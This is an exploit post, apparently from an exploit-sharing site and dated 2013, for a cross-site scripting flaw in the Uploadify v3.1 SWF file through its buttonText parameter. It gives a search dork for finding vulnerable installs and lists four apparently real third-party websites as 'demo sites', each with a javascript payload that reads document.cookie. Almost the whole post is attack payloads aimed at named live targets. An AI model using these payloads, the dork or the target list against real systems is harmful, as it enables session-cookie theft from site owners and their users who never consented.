Uploadify v3.1 XSS Vulnerability

===============================
Title : Uploadify v3.1 XSS Vulnerability
# Date: 2013-09-1
# Software Link: [You must be registered and logged in to see this link.]
# Founded by: ''Master Zombie''
# Tested on: Windows XP SP3
# Category: [webapps]
# Dork : inurl:admin/include/uploadify
===============================

Exploit path:

Code:

http://127.0.0.1/admin/include/uploadify/uploadify.swf?buttonText=<a href=[ XSS ]

Demo Sites :

Code:

http://www.renders-dbz.com/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>

Code:

http://photos.davidandginny.co.uk/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>

Code:

http://landevejsridder.dk/piwigo/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>

Code:

http://massecritique.agora.eu.org/piwigo/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>